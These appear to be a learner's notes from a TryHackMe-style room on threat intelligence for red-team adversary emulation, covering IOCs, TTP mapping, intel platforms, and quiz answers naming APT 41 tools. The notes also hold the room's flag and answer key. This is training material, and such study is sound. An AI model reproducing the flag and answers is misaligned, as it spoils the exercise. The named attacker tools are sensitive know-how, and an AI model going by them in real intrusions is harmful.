Threat Intelligence is attributed to an adversary, commonly used by defenders to aid in detection measures. -can be used in adversary emulation -collection of indicators of compromise (IOCs): Domains, IPs, files, strings, etc
-Red team will use threat intelligence to craft tooling, modify traffic and behavior to emulate target adversary -TTP mapping: aids the red team in planning an engagement to emulate an adversary (Target industry, employted attack vectors, country and other factors) -MITRE ATT&CK -Mandiant Advantage -Ontic -CrowdStrike Falcon
THM{7HR347_1N73L_12 _4w35om3}
What web shell is APT 41 known to use? -ASPXSpy
What LOLBAS (Living Off The Land Binaries and Scripts) tool does APT 41 use to aid in file transfers? -certutil
What tool does APT 41 use to mine and monitor SMS traffic? -MESSAGETAPc